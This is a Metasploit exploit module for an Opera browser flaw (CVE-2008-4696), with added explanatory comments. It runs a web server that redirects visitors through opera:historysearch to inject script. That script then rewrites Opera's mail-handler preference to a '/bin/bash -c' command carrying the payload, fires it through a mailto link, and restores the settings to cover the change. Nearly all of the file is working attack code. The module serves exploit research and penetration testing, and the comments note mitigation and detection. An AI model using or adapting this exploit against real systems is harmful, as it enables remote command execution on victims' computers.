##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
# Exploit module for CVE-2008-4696 (BID 31869, OSVDB 49472): script
# injection in Opera's opera:historysearch results page. The module runs an
# HTTP server and answers three variants of its own resource URI (see
# on_request_uri); the only active target is a Unix command payload.
# The target name ("Opera < 9.60") and the Opera KB reference below indicate
# the issue was fixed in Opera 9.60, so upgrading is the mitigation.
class Metasploit3 < Msf::Exploit::Remote

# Supplies the HTTP server plumbing used below: get_resource,
# send_response_html, send_not_found and the request callback hook.
include Msf::Exploit::Remote::HttpServer::HTML

# Registers the module's metadata (name, references, payload constraints,
# targets) with the framework.
#
# @param info [Hash] metadata supplied by the framework; merged via update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'Opera historysearch XSS',
'Description' => %q{
Certain constructs are not escaped correctly by Opera's History
Search results. These can be used to inject scripts into the
page, which can then be used to modify configuration settings
and execute arbitrary commands.
},
'License' => BSD_LICENSE,
'Author' =>
[
'Roberto Suggi', # Discovered the vulnerability
'Aviv Raff <avivra [at] gmail.com>', # showed it to be exploitable for code exec
'egypt', # msf module
],
'Version' => '$Revision: 5773 $',
'References' =>
[
['BID', '31869'],
['OSVDB', '49472'],
['CVE', '2008-4696'],
['URL', 'http://www.opera.com/support/kb/view/903/'],
],
'Payload' =>
{
'ExitFunc' => 'process',
'Space' => 4000,
'DisableNops' => true,
# Tab, LF, CR and space are excluded from the payload.
# NOTE(review): on_request_uri %-hex encodes the whole payload (penc)
# before it reaches the browser, so this list may be more conservative
# than strictly required -- confirm before relaxing it.
'BadChars' => "\x09\x0a\x0d\x20",
},
'Targets' =>
[
# The Automatic and Windows targets are commented out; only the Unix
# command target below is selectable.
#[ 'Automatic', { } ],
#[ 'Opera < 9.60 Windows',
# {
# 'Platform' => 'win',
# 'Arch' => ARCH_X86,
# }
#],
[ 'Opera < 9.60 Unix Cmd',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
}
],
],
# NOTE(review): DisclosureDate is left empty; it should be filled in from
# the Opera KB advisory referenced above rather than left blank.
'DisclosureDate' => ''
))
end

# HTTP request callback. Every response is a small "Loading" page built from
# html_hdr/html_ftr, and the branch is chosen by matching request.uri:
#
#   * /[?]jspayload/ -- serves the JavaScript stage. It creates an iframe to
#     opera:config, then via config_window.eval saves the Mail
#     "External Application" and "Handler" preferences, replaces them with
#     a /bin/bash -c command wrapping the %-encoded payload, creates and
#     clicks a mailto: link, and restores the saved preferences and
#     navigates to about:blank on 500 ms timers.
#   * /[?]history/   -- serves a page whose onload navigates to
#     opera:historysearch?q=*, which (per the module Description) renders
#     the injected markup carried in the URL.
#   * get_resource() -- the entry page: its onload redirects to the same URL
#     with "?history#<script src='...?jspayload=1'/><!--" appended.
#   * anything else  -- 404 via send_not_found.
#
# Detection notes: a single client is expected to request the resource,
# then "<resource>?history", then "<resource>?jspayload=1"; every served
# page carries the literal title and heading "Loading".
#
# @param cli [Rex::Socket] the connected client
# @param request [Rex::Proto::Http::Request] the parsed request
# @return [nil]
def on_request_uri(cli, request)

# No extra response headers are set; passed through to send_response_html.
headers = {}
# Shared HTML wrapper for the history and entry pages.
html_hdr = %Q^
<html>
<head>
<title>Loading</title>
^
html_ftr = %Q^
</head>
<body >
<h1>Loading</h1>
</body></html>
^

# The two query-string forms are matched before the bare resource so that
# the plain resource only matches an exact URI.
case request.uri
when /[?]jspayload/
# Payload is generated per client; without one there is nothing to serve.
p = regenerate_payload(cli)
if (p.nil?)
send_not_found(cli)
return
end
# We're going to run this through unescape(), so make sure
# everything is encoded
penc = Rex::Text.to_hex(p.encoded, "%")
# The served body is JavaScript (loaded via the <script src=...> planted
# by the entry page). %22 is an encoded double quote around the payload.
content =
%Q{
var s = document.createElement("iframe");

s.src="opera:config";
s.id="config_window";
document.body.appendChild(s);
setTimeout(function () {location.href='about:blank'},1000);
config_window.eval(
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
"old_app = opera.getPreference('Mail','External Application');" +
"old_handler = opera.getPreference('Mail','Handler');" +
"opera.setPreference('Mail','External Application',cmd);" +
"opera.setPreference('Mail','Handler','2');" +
"app_link = document.createElement('a');" +
"app_link.setAttribute('href', 'mailto:a@b.com');" +
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},500);" +
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},500);" +
"setTimeout(function () {location.href='about:blank'},500);" +
"app_link.click();" +
"");
}

when /[?]history/
# Second stage: send the browser to the history search page.
js = %Q^
window.onload = function() {
location.href = "opera:historysearch?q=*";
}
^
content = %Q^
#{html_hdr}
<script><!--
#{js}
//--></script>
#{html_ftr}
^
when get_resource()
print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")

# First stage: redirect to ourselves with the history marker and the
# script tag (pointing back at ?jspayload=1) appended to the URL.
js = %Q^
window.onload = function() {
url = location.href;
location.href = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
}
^
content = %Q^
#{html_hdr}
<script><!--
#{js}
//--></script>
#{html_ftr}
^
else
print_status("Sending 404 to #{cli.peerhost} for request #{request.uri}")
send_not_found(cli)
return
end

# Strip four leading tabs of source indentation from the served content and
# turn any remaining tabs into spaces. (In this un-indented rendering the
# first substitution is a no-op; it matters in the tab-indented original.)
content.gsub!(/^\t{4}/, '')
content.gsub!(/\t/, ' ')

send_response_html(cli, content, headers)
# Hand the connection to the payload handler after the response is sent.
handler(cli)
end

end